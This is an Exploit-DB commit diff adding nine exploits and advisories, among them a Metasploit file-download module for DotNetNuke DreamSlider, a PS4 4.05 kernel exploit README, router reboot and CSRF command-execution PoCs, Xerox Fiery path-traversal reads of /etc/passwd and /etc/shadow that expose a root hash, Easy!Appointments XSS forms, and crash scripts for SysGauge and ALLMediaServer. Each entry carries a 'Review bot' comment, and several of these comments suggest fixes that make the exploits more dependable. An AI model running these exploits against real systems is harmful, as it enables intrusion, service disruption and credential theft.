DB: 2017-12-28

9 changes to exploits/shellcodes

Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service
SysGauge Server 3.6.18 - Denial of Service
ALLMediaServer 0.95 - Buffer Overflow

Sony Playstation 4 4.05 FW - Local Kernel Loader
Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure
Easy!Appointments 1.2.1 - Cross-Site Scripting
Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery
Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure
DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download
Offensive Security 2017-12-28 05:02:19 +00:00
parent b91055c9da
commit 267f841bd8
10 changed files with 681 additions and 0 deletions

exploits/aspx/webapps/43405.rb Executable file

@ -0,0 +1,131 @@
# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 01.01.02
# Vendor: DreamSlider
# Vendor URL: http://www.dreamslider.com/
# Google Dork: inurl:/DesktopModules/DreamSlider/
# CVE:
#
# Description
# DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability
#
# Vulnerable Code
#
# namespace DotNetNuke.Modules.DreamSlider
# {
# using System;
# using System.IO;
# using System.Web.SessionState;
# using System.Web.UI;
#
# public class DownloadProvider : Page, IRequiresSessionState
# {
# protected void Page_Load(object sender, EventArgs e)
# {
# if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
# {
# string path = base.Request.QueryString["File"];
# string fileName = Path.GetFileName(path);
# base.Response.ContentType = "application/octet-stream";
# base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
# base.Response.WriteFile(path);
# base.Response.End();
# }
# }
# }
# }
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'DotNetNuke DreamSlider Arbitrary File Download',
'Description' => %q{
This module exploits an unauthenticated arbitrary file download vulnerability in DNN
DreamSlider version 01.01.02 and below.
},
'Author' =>
[
'Glafkos Charalambous', # Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'DisclosureDate' => 'Mar 23 2015'))
register_options(
[
Opt::RPORT(80),
OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
'cookie' => datastore['Cookie'],
})
if res && res.code == 200 and res.body.to_s =~ /Download Provider/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Safe
end
end
def run
begin
print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
'cookie' => datastore['Cookie'],
})
rescue Rex::ConnectionError
print_error("#{peer} - Could not connect.")
return
end
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
return
end
fileName = datastore['FILENAME']
path = store_loot(
'ds.http',
'application/octet-stream',
datastore['RHOST'],
res.body,
fileName
)
print_good("#{peer} - File saved in: #{path}")
else
print_error("#{peer} - Failed to download file.")
end
end
end
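
Review bot: the `check` method's `begin` block has no `rescue`, so a connection failure raises out of `check` instead of returning `Exploit::CheckCode::Unknown`, and the bare `Exploit::CheckCode::Safe` after the `if`/`else` is unreachable because both branches already `return`; add `rescue Rex::ConnectionError` returning `Exploit::CheckCode::Unknown` (as `run` already does) and drop the dead line. Two smaller points in the same hunk: `if res && res.code == 200 and res.body.to_s =~ /Download Provider/` mixes `&&` with the lower-precedence `and`, use `&&` throughout; and in `run` the `File` value is string-concatenated onto the URI after `normalize_uri`, so a FILENAME containing spaces, `&` or `#` is sent unencoded, pass it as `'vars_get' => { 'File' => datastore['FILENAME'] }` instead. The metadata also disagrees with itself: the header says `Date: 23/01/2014` while `DisclosureDate` is `Mar 23 2015`, and the only reference is `http://metasploit.com`; cite the vendor URL from the header or an advisory. Finally, the "Vulnerable Code" comment is a good inclusion, but it would help readers to state that `Path.GetFileName(path)` there only sanitizes the download name in the `Content-Disposition` header while `WriteFile(path)` still receives the raw query string, which is the actual defect a fix has to address.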


@ -0,0 +1,32 @@
# PS4 4.05 Kernel Exploit
---
## Summary
In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days).
## Patches Included
The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
## Notes
- This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel.
- I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads.
- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
- An SDK is not provided in this release, however a barebones one to get started with may be released at a later date.
- I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox.
## Contributors
I was not alone in this exploit's development, and would like to thank those who helped me along the way below.
- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
- [Flatz](https://twitter.com/flat_z)
- [CTurt](https://twitter.com/CTurtE)
- Anonymous
E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip
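
Review bot: the "Summary" section links the technical write-up to a struck-through `~~here~~` placeholder described as "still in progress", and the "Notes" section links a sample payload binary on a third-party file host with no checksum; the placeholder link should be removed until the write-up exists (or marked plainly as forthcoming without a dead anchor), and the payload link should carry a SHA-256, or the payload should ship inside the archive referenced in the E-DB note, so readers can verify what they are loading. A second documentation gap: "Patches Included" says the ROP chain disables kernel write protection and registers syscall #11, and the "Notes" say the exploit "will only run once on the system", but neither section says whether the loader checks the firmware version before running or how the run-once state is detected; one sentence on each would let a reader predict behaviour on a console that is not on 4.05.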

exploits/hardware/dos/43401.py Executable file

@ -0,0 +1,62 @@
#!/usr/bin/env python
#
#
# Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service
#
#
# Vendor: Telesquare Co., Ltd.
# Product web page: http://www.telesquare.co.kr
# Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
# LteVer: ML300S5XEA41_090 1 0.1.0
# Modem model: PM-L300S
#
# Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
# LTE wireless communication based LTE router product.
#
# Desc: The router suffers from an unauthenticated reboot command execution.
# Attackers can exploit this issue to cause a denial of service scenario.
#
# --------------------------------------------------------------------
# /lte/lteuicc.shtml:
# -------------------
#
# 858: function RebootRequest()
# 859: {
# 860: var url = "../cgi-bin/lte.cgi?";
# 861: var param = "Command=Reboot";
# 862: XHRPost(RebootHandle, url, param, false ); //sync call
# 863: }
#
# --------------------------------------------------------------------
#
# Tested on: lighttpd/1.4.20
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5444
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5444.php
#
#
# 22.12.2017
#
import sys, requests
if len(sys.argv) < 2:
print 'SKT LTE Router SDT-CS3B1 Remote Reboot'
print 'Usage: b00t.py <ip> <port>\n'
quit()
ip = sys.argv[1]
port = sys.argv[2]
r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")
# shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done
#print r.content #if in r.content: <xml></xml>, reboot true.
print "Router rebooted."
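
Review bot: the usage guard `if len(sys.argv) < 2` does not cover the second required argument, so running the script with only an IP skips the usage message and dies with an `IndexError` at `port = sys.argv[2]`; the check should be `len(sys.argv) < 3`. The `requests.get(...)` call has no `timeout=`, and since the target is expected to reboot on this very request the call can block indefinitely; pass a timeout and handle `requests.exceptions.RequestException`. The closing `print "Router rebooted."` is unconditional, while the commented-out line just above notes that an `<xml></xml>` body is what actually confirms the reboot; check `r.content` before reporting success. The `print` statements are Python 2 syntax, and "Tested on: lighttpd/1.4.20" names the web server, not the interpreter, so the header should say which Python version the script targets.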


@ -0,0 +1,55 @@
Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution
Vendor: Telesquare Co., Ltd.
Product web page: http://www.telesquare.co.kr
Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
LteVer: ML300S5XEA41_090 1 0.1.0
Modem model: PM-L300S
Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
LTE wireless communication based LTE router product.
Desc: The router suffers from authenticated arbitrary system command
execution. The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain actions
with administrative privileges if a logged-in user visits a malicious
web site.
Tested on: lighttpd/1.4.20
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5443
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5443.php
22.12.2017
--
IDOR for system command interface:
----------------------------------
GET /admin/system_command.shtml HTTP/1.1
PoC GET CSRF request:
---------------------
<html>
<body>
<form action="http://10.0.0.17:8081/cgi-bin/admin.cgi">
<input type="hidden" name="Command" value="sysCommand" />
<input type="hidden" name="Cmd" value="uname%20-a" />
<input type="hidden" name="T" value="8168008531337" />
<input type="submit" value="Send" />
</form>
</body>
</html>
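
Review bot: the description says the interface performs no validity checks, yet the PoC form sends a hidden `T` parameter with the value `8168008531337`; the advisory should state whether `T` is validated server-side (a session-bound anti-CSRF token would defeat this PoC) or is merely a timestamp/cache-buster, because that is the one fact a reader needs to judge the finding. The form has no `method` attribute and therefore submits via GET, which matches the "PoC GET CSRF request" label, but the line "IDOR for system command interface: GET /admin/system_command.shtml" belongs with the companion information-disclosure advisory (ZSL-2017-5445) and reads as a stray paste here; either drop it or explain that the command page itself is reachable without authorization. The header's "authenticated arbitrary system command execution" and the title's "CSRF" are consistent only if the reader understands that the victim's browser supplies the session cookie, so say so in the "Desc" paragraph.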


@ -0,0 +1,53 @@
Telesquare SKT LTE Router SDT-CS3B1 Insecure Direct Object Reference Info Leak
Vendor: Telesquare Co., Ltd.
Product web page: http://www.telesquare.co.kr
Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
LteVer: ML300S5XEA41_090 1 0.1.0
Modem model: PM-L300S
Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
LTE wireless communication based LTE router product.
Desc: Insecure direct object references occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access resources and functionalities in the system.
Tested on: lighttpd/1.4.20
Linux mips
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5445
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5445.php
22.12.2017
--
/home.html << Version and status info leak (firmware, device, type, modem, lte)
/index.html << Version and status info leak (firmware, device, type, modem, lte)
/nas/smbsrv.shtml << Samba server settings (workgroup, netbios name)
/nas/ftpsrv.shtml << FTP settings
/wifi2g/basic.shtml << Wireless settings
/admin/status.shtml << Access point status info leak
/internet/wan.shtml << WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns)
/internet/lan.shtml << LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns)
/admin/statistic.shtml << System statistics info leak
/admin/management.shtml << System management (account settings, ntp settings, ddns settings)
/serial/serial_direct.shtml << Direct serial settings (network connection settings, serverip, port)
/admin/system_command.shtml << System command interface
/internet/dhcpcliinfo.shtml << DHCP Clients info leak (hostname, macaddr, ipaddr)
/admin/upload_firmware.shtml << Router firmware and lte firmware upgrade
/firewall/vpn_futuresystem.shtml << VPN settings (udp packet transfer, icmp check)
/cgi-bin/lte.cgi?Command=getUiccState << GetUiccState()
/cgi-bin/lte.cgi?Command=getModemStatus << Modem status info leak
/cgi-bin/systemutil.cgi?Command=SystemInfo << System info leak
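
Review bot: the "Desc" paragraph is a generic definition of insecure direct object references, and the list of eighteen paths does not say under what conditions each was retrieved; for each entry (or at least for each group, the `.shtml` pages versus the `.cgi` commands) state whether it was fetched with no session cookie at all or with a low-privilege session, because missing authentication and missing authorization call for different fixes on the device. A single request/response pair for one representative path (for example `/cgi-bin/systemutil.cgi?Command=SystemInfo`, with the leaked values redacted) would make the claim verifiable. Minor: "Tested on: lighttpd/1.4.20" and "Linux mips" are two fields run onto separate lines without a label on the second.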


@ -0,0 +1,142 @@
Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure
Vendor: Electronics for Imaging, Inc.
Product web page: http://www.efi.com
Affected version: EFI Fiery Controller SW2.0
Xerox DocuColor 260, 250, 242
Summary: Drive production profitability with Fiery servers and workflow
products. See which Fiery digital front end is right for your current
or future print engines and business needs. Manage all your printers
from a single screen using this intuitive print job management interface.
Desc: Input passed thru the 'file' GET parameter in 'forceSave.php'
script is not properly sanitized before being used to read files. This
can be exploited by an unauthenticated attacker to read arbitrary files
on the affected system.
======================================================================
/wt3/js/save.js:
----------------
103: function parseSaveMessages() {
104: var urlNode = saveDocument.getElementsByTagName('url').item(0);
105: var url = urlNode.firstChild.data;
106: var forcedSaveUrl = "forceSave.php?file=" + url;
107: window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1');
====
/wt3/forceSave.php:
-------------------
1. <?php
2. //code posted by chrisputnam at gmail dot com
3. function readfile_chunked($filename,$retbytes=true)
4. {
5. $chunksize = 1*(1024*1024); // how many bytes per chunk
6. $buffer = '';
7. $cnt =0;
8. // $handle = fopen($filename, 'rb');
9. $handle = fopen($filename, 'rb');
10. if ($handle === false)
11. {
12. return false;
13. }
14. while (!feof($handle))
15. {
16. //read a chunk
17. $buffer = fread($handle, $chunksize);
18. //send the chunk
19. echo $buffer;
20. //flush the chunk
21. flush();
22. //increment the size read/sent
23. if ($retbytes)
24. {
25. $cnt += strlen($buffer);
26. }
27. }
28. //close file
29. $status = fclose($handle);
30. if ($retbytes && $status)
31. {
32. return $cnt; // return num. bytes delivered like readfile() does.
33. }
34. return $status;
35. }
36.
37. $filename = $_GET['file'];
38. if(!$filename)
39. {
40. echo "ERROR: No filename specified. Please try again.";
41. }
42. else
43. {
44. // fix for IE caching or PHP bug issue
45. header("Pragma: public");
46. header("Expires: 0"); // set expiration time
47. header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
48. // browser must download file from server instead of cache
49.
50. // force download dialog
51. header("Content-Type: application/force-download");
52. header("Content-Type: application/octet-stream");
53. header("Content-Type: application/download");
54.
55. // use the Content-Disposition header to supply a recommended filename and
56. // force the browser to display the save dialog.
57. header("Content-Disposition: attachment; filename=" . basename($filename) . ";");
58. header("Content-Transfer-Encoding: binary");
59.
60. header("Content-Length: " . filesize($filename));
61.
62. set_time_limit(0);
63. readfile_chunked($filename, false);
64.
65. exit();
66. }
67.
68. ?>
======================================================================
Tested on: Debian GNU/Linux 3.1
Apache
PHP/5.4.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5447
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
20.12.2017
--
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
...
...
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow"
root:LUUVeT6GbOy9I:10978:0:99999:7:::
daemon:*:10979:0:99999:7:::
bin:*:10979:0:99999:7:::
sys:*:10979:0:99999:7:::
sync:*:10979:0:99999:7:::
games:*:10979:0:99999:7:::
...
...
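
Review bot: the `/etc/shadow` output after the second `curl` prints what appears to be a real DES-crypt root hash (`root:LUUVeT6GbOy9I:...`) from the tested system; redact the hash field before publication, since the `*` entries and the file name already prove the read. On the code itself, the advisory correctly points at `$filename = $_GET['file']` flowing into `fopen()` and `filesize()`, but it should add that the `basename($filename)` on the `Content-Disposition` line sanitizes only the suggested download name, not the path that is opened, so a reader does not mistake it for a mitigation; the fix is to resolve the requested name against a fixed download directory and reject anything whose real path falls outside it. The `save.js` excerpt shows that `url` comes from an XML `<url>` element the server itself produced, which is the natural place to note that `forceSave.php` should accept a server-issued identifier rather than a filesystem path.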


@ -0,0 +1,112 @@
Easy!Appointments v1.2.1 Multiple Stored XSS Vulnerabilities
Vendor: Alex Tselegidis
Product web page: http://www.easyappointments.org
Affected version: 1.2.1
Summary: Easy!Appointments is a highly customizable web application
that allows your customers to book appointments with you via the web.
Moreover, it provides the ability to sync your data with Google Calendar
so you can use them with other services. It is an open source project
and you can download and install it even for commercial use. Easy!Appointments
will run smoothly with your existing website, because it can be installed
in a single folder of the server and of course, both sites can share
the same database. Learn more about the project in the Features page.
Desc: The application suffers from multiple stored and reflected XSS
vulnerabilities. The issues are triggered when an unauthorized input
passed via multiple POST and GET parameters is not properly sanitized
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.
Tested on: Apache/2.4.23 (Win32)
OpenSSL/1.0.2h
MariaDB-10.1.19
PHP/5.6.28
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5442
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5442.php
20.10.2017
--
PoC:
{"name":"XSS1","description":"Description"}
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/backend_api/ajax_save_service_category" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="category" value="&#123;"name"&#58;"XSS1"&#44;"description"&#58;"Description"&#125;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="service&#95;id" value='"><script>alert(2)</script>' />
<input type="hidden" name="provider&#95;id" value="85" />
<input type="hidden" name="selected&#95;date" value="2017&#45;11&#45;30" />
<input type="hidden" name="service&#95;duration" value="30" />
<input type="hidden" name="manage&#95;mode" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="service&#95;id" value="13" />
<input type="hidden" name="provider&#95;id" value="85" />
<input type="hidden" name="selected&#95;date" value="<marquee>" />
<input type="hidden" name="service&#95;duration" value="30" />
<input type="hidden" name="manage&#95;mode" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_register_appointment" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;last&#95;name&#93;" value="sdadsd" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;first&#95;name&#93;" value="asdasd" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;email&#93;" value="asdasd&#64;bbb&#46;dd" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;phone&#95;number&#93;" value="1112223333" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;address&#93;" value="" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;city&#93;" value="" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;zip&#95;code&#93;" value="" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;start&#95;datetime&#93;" value=""><script>alert&#40;3&#41;<&#47;script>" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;end&#95;datetime&#93;" value="2017&#45;11&#45;30&#32;16&#58;00&#58;00" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;notes&#93;" value="" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;is&#95;unavailable&#93;" value="false" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;id&#95;users&#95;provider&#93;" value="85" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;id&#95;services&#93;" value="13" />
<input type="hidden" name="post&#95;data&#91;manage&#95;mode&#93;" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
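
Review bot: the fourth PoC's `start_datetime` input reads `value=""><script>alert&#40;3&#41;<&#47;script>" />`, where the attribute's opening `""` closes it immediately, so the browser ends the `<input>` tag at the first `>`, runs the script inside the PoC page itself, and submits an empty `start_datetime`; the inner double quote must be written as `&#34;` (or the value wrapped in single quotes, as the second PoC already does) for the form to send the intended payload. The first PoC submits `category` as `{"name":"XSS1","description":"Description"}`, which contains no markup at all and therefore demonstrates nothing as written; the `name` field needs an actual test string or the entry should be dropped. The advisory also says "multiple stored and reflected XSS" but does not say which of the four requests is stored and which page later renders the stored value, and all four hardcode `csrfToken` `f5300ab64a4fae7bc3e56f2502905459`, which is session-bound; note that the token is the tester's own and must be replaced to reproduce.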

exploits/windows/dos/43403.py Executable file

@ -0,0 +1,41 @@
# Exploit Title: SysGauge Server 3.6.18 - DOS
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe
# Version: v3.6.18
# Category; Windows Remote DOS
# CVE: CVE-2017-15667
# Author Homepage: www.unixawy.com
# Description: SysGauge Server 3.6.18 the Control Protocl suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9221.
#!/usr/bin/env python
import socket
target = "192.168.72.133"
port = 9221
s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e"
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
         data = s.recv(100)
except:
         print "K1LL3D"
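
Review bot: the `#!/usr/bin/env python` line sits after nine comment lines, so it is not a shebang and the file will not run directly as `./43403.py`; move it to line 1. The crash check `try: data = s.recv(100) except: print "K1LL3D"` has no socket timeout, so if the service survives the packet `recv` blocks forever, and the bare `except:` also swallows `KeyboardInterrupt`; set `s.settimeout(...)`, catch `socket.error`/`socket.timeout` explicitly, and treat an empty return from `recv` (peer closed the connection) as the actual crash signal rather than only an exception. Header nits: `hhttp://` in Software Link, `Category;` should be `Category:`, and "Protocl" in the description. The `"\x.."` string literals rely on Python 2 byte semantics; under Python 3 `s.send` needs `bytes`.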

exploits/windows/dos/43406.py Executable file

@ -0,0 +1,44 @@
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service
1. Description
A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
2. Proof of Concept
#!/usr/bin/python
#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.205.131', 888))
buffer = "A" * 3000
s.send(buffer)
s.close()
if __name__ == '__main__':
import socket
main()
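
Review bot: the description says the long string goes to TCP port 88 while the PoC connects to port 888 (`s.connect(('192.168.205.131', 888))`); one of the two is wrong and the reader cannot tell which, so reconcile them with the port the crash was reproduced on. The `import socket` inside the `if __name__ == '__main__':` guard works only because `main()` is called from there; move it to the top of the file. The header's `Category: webapps` contradicts the `exploits/windows/dos/` path and the CSV row (type `dos`, platform `windows`), and "Te exploit this vulnerability" should read "To exploit". The "Impact: Code execution" claim is not supported by a 3000-byte `"A"` fill alone; either record the crash details (the NOTE mentions IDA Pro as the JIT debugger but gives none) or scope the stated impact to denial of service.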


@ -5433,6 +5433,9 @@ id,file,description,date,author,type,platform,port
43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows,
43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows,
43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware,
43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows,
43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow",2017-12-27,"Aloyce J. Makalanga",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
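
Review bot: the new `43406` row records `dos`/`windows`, which disagrees with the `Category: webapps` header inside `43406.py`; the CSV classification matches the PoC (a crash via a long string to a TCP port), so the file header is the one to correct. The `date` column for all three new rows is `2017-12-27` while the files themselves carry `22.12.2017` (43401) and `2017-10-20` (43403); if this column is the publication date rather than the author's date, it would help to say so where the column is documented, since readers compare the two.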
@ -9235,6 +9238,7 @@ id,file,description,date,author,type,platform,port
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -37669,6 +37673,11 @@ id,file,description,date,author,type,platform,port
43394,exploits/php/webapps/43394.txt,"Biometric Shift Employee Management System 3.0 - Local File Disclosure",2017-12-26,"Ihsan Sencan",webapps,php,
43395,exploits/php/webapps/43395.php,"Sendroid < 6.5.0 - SQL Injection",2017-12-26,"Onwuka Gideon",webapps,php,
43396,exploits/php/webapps/43396.txt,"SilverStripe CMS 3.6.2 - CSV Excel Macro Injection",2017-12-26,"Ishaq Mohammed",webapps,php,
43398,exploits/php/webapps/43398.txt,"Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure",2017-12-27,LiquidWorm,webapps,php,
43399,exploits/php/webapps/43399.txt,"Easy!Appointments 1.2.1 - Cross-Site Scripting",2017-12-27,LiquidWorm,webapps,php,
43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
